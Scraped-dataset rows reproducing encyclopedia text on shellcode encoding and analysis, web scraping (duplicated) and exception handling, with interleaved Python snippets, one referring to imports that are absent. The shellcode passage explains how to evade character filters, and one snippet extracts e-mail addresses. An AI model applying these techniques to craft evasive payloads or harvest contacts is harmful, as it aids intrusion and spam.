any byte from the injected shellcode that is not a printable or alphanumeric character. Under such circumstances, the range of instructions that can be used to write a shellcode becomes very limited. A solution to this problem was published by Rix in Phrack 57 11 in which he showed it was possible to turn any code into alphanumeric code. A technique often used is to create self-modifying code, because this allows the code to modify its own bytes to include bytes outside of the normally allowed range, thereby expanding the range of instructions it can use. Using this trick, a self-modifying decoder can be created that initially uses only bytes in the allowed range. The main code of the shellcode is encoded, also only using bytes in the allowed range. When the output shellcode is run, the decoder can modify its own code to be able to use any instruction it requires to function properly and then continues to decode the original shellcode. After decoding the shellcode the decoder transfers control to it, so it can be executed as normal. It has been shown that it is possible to create arbitrarily complex shellcode that looks like normal text in English. 13 Modern programs use Unicode strings to allow internationalization of text. Often, these programs will convert incoming ASCII strings to Unicode before processing them. 
Unicode strings encoded in UTF 16 use two bytes to encode each character (or four bytes for some special characters). When an ASCII (Latin 1 in general) string is transformed into UTF 16, a zero byte is inserted after each byte in the original string. Obscou proved in Phrack 61 12 that it is possible to write shellcode that can run successfully after this transformation. Programs that can automatically encode any shellcode into alphanumeric UTF 16 proof shellcode exist, based on the same principle of a small self-modifying decoder that decodes the original shellcode. Most shellcode is written in machine code because of the low level at which the vulnerability being exploited gives an attacker access to the process. Shellcode is therefore often created to target one specific combination of processor, operating system and service pack, called a platform. For some exploits, due to the constraints put on the shellcode by the target process, a very specific shellcode must be created. However, it is not impossible for one shellcode to work for multiple exploits, service packs, operating systems and even processors. 15 16 17 Such versatility is commonly achieved by creating multiple versions of the shellcode that target the various platforms and creating a header that branches to the correct version for the platform the code is running on. When executed, the code behaves differently for different platforms and executes the right part of the shellcode for the platform it is running on. Shellcode cannot be executed directly. In order to analyze what a shellcode attempts to do it must be loaded into another process. One common analysis technique is to write a small C program which holds the shellcode as a byte buffer, and then use a function pointer or use inline assembler to transfer execution to it. Another technique is to use an online tool, such as shellcode 2 exe, to embed the shellcode into a pre-made executable husk which can then be analyzed in a standard debugger. Specialized shellcode analysis tools also exist, such as the iDefense sclog project which was originally released in 2005 as part of the Malcode Analyst Pack. Sclog is designed to load external shellcode files and execute them within an API logging framework. Emulation-based shellcode analysis tools also exist such as the sctest application which is part of the cross-platform libemu package. Another emulation-based shellcode analysis tool, built around the libemu library, is scdbg which includes a basic debug shell and integrated reporting features. |
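As a rough illustration of the null-free and alphanumeric constraints discussed above, the following Python sketch checks whether a byte buffer would survive the filters described; the sample bytes are placeholders chosen for the example, not real shellcode.

def is_null_free(payload: bytes) -> bool:
    # A null byte would truncate the payload when copied as a C string.
    return b"\x00" not in payload

def is_alphanumeric(payload: bytes) -> bool:
    # True if the buffer is non-empty and every byte is ASCII 0-9, A-Z or a-z.
    return payload.isascii() and payload.isalnum()

sample = b"\x90\x90\xeb\x0e"   # placeholder instruction bytes
print(is_null_free(sample))    # True
print(is_alphanumeric(sample)) # False - would not pass an alphanumeric filter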
526 | https://en.wikipedia.org/wiki/Data_scraping | https://zh-yue.wikipedia.org/wiki/%E6%95%B8%E6%93%9A%E5%88%AE%E5%8F%96 | data scraping |
527 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-impervawp2011-14 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
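The fetch-then-extract sequence described above maps directly onto the requests and BeautifulSoup imports used earlier in this document. The sketch below is a minimal example, and the target URL is chosen purely for illustration.

import requests
from bs4 import BeautifulSoup

resp = requests.get("https://en.wikipedia.org/wiki/Web_scraping", timeout=10)
resp.raise_for_status()                      # fetching: download the page
soup = BeautifulSoup(resp.text, "html5lib")  # extraction: parse the HTML
print(soup.title.get_text())                 # copy one piece of data out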
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
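Before moving on to dedicated tools, the regular-expression approach mentioned earlier can be illustrated with Python's re module. The snippet pulls e-mail-like strings out of a raw HTML fragment; the sample markup is invented for the example.

import re

html = 'Contact <a href="mailto:info@example.com">info@example.com</a> for details.'
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)
print(emails)  # ['info@example.com', 'info@example.com']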
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
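Many such countermeasures key on request rate and on paths the site has declared off limits, so a scraper that wants to avoid tripping them typically consults robots.txt and throttles itself. The following sketch, using only the standard library plus the time import from earlier in this document, is one possible way to do that; the URLs are placeholders.

from urllib import robotparser
import time

rp = robotparser.RobotFileParser()
rp.set_url("https://en.wikipedia.org/robots.txt")
rp.read()                                   # fetch the site's crawl rules

url = "https://en.wikipedia.org/wiki/Web_scraping"
if rp.can_fetch("*", url):                  # respect Disallow rules
    time.sleep(2)                           # crude rate limiting between requests
    print("allowed to fetch:", url)
else:
    print("robots.txt disallows:", url)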
528 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-5 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
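The entry above ends by noting that a site administrator can use various measures to stop or slow a bot. As a minimal sketch of one such measure, the following Python snippet implements a simple sliding-window rate limiter keyed by client IP; the class name, the limits, and the example IP address are illustrative choices, not something taken from the scraped source.

import time
from collections import defaultdict, deque

class RateLimiter:
    # Minimal sliding-window rate limiter keyed by client IP (illustrative).
    def __init__(self, max_requests=60, window_seconds=60):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self.history = defaultdict(deque)  # ip -> timestamps of recent requests

    def allow(self, ip):
        now = time.monotonic()
        window = self.history[ip]
        # Discard timestamps that have fallen out of the window
        while window and now - window[0] > self.window_seconds:
            window.popleft()
        if len(window) >= self.max_requests:
            return False  # too many recent requests from this client
        window.append(now)
        return True

limiter = RateLimiter(max_requests=5, window_seconds=1)
for i in range(8):
    print(i, "allowed" if limiter.allow("203.0.113.7") else "throttled")

A real deployment would typically combine throttling like this with robots.txt rules, CAPTCHAs, or a bot-management service; the sketch only shows the rate-limiting idea.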
529 | https://en.wikipedia.org/wiki/Web_scraping | https://www.mediawiki.org | The MediaWiki software is used by tens of thousands of websites and thousands of companies and organisations. It powers Wikipedia and also this website. MediaWiki helps you collect and organise knowledge and make it available to people. It's powerful, multilingual, free and open, extensible, customisable, reliable, and free of charge. Find out more and if MediaWiki is right for you. |
530 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Error_handling | In computing and computer programming, exception handling is the process of responding to the occurrence of exceptions (anomalous or exceptional conditions requiring special processing) during the execution of a program. In general, an exception breaks the normal flow of execution and executes a pre-registered exception handler; the details of how this is done depend on whether it is a hardware or software exception and how the software exception is implemented. Exceptions are defined by different layers of a computer system, and the typical layers are CPU-defined interrupts, operating system (OS) defined signals, and programming language-defined exceptions. Each layer requires different ways of exception handling, although they may be interrelated, e.g. a CPU interrupt could be turned into an OS signal. Some exceptions, especially hardware ones, may be handled so gracefully that execution can resume where it was interrupted. The definition of an exception is based on the observation that each procedure has a precondition, a set of circumstances for which it will terminate "normally". 1 An exception handling mechanism allows the procedure to raise an exception 2 if this precondition is violated, 1 for example if the procedure has been called on an abnormal set of arguments. The exception handling mechanism then handles the exception. 3 The precondition, and the definition of exception, is subjective. The set of "normal" circumstances is defined entirely by the programmer, e.g. the programmer may deem division by zero to be undefined, hence an exception, or devise some behavior such as returning zero or a special "ZERO DIVIDE" value (circumventing the need for exceptions). 4 Common exceptions include an invalid argument (e.g. value is outside of the domain of a function), 5 an unavailable resource (like a missing file, 6 a network drive error, 7 or out-of-memory errors 8 ), or that the routine has detected a normal condition that requires special handling, e.g., attention, end of file. 9 Social pressure is a major influence on the scope of exceptions and use of exception-handling mechanisms, i.e. "examples of use, typically found in core libraries, and code examples in technical books, magazine articles, and online discussion forums, and in an organization’s code standards". 10 Exception handling solves the semipredicate problem, in that the mechanism distinguishes normal return values from erroneous ones. In languages without built-in exception handling such as 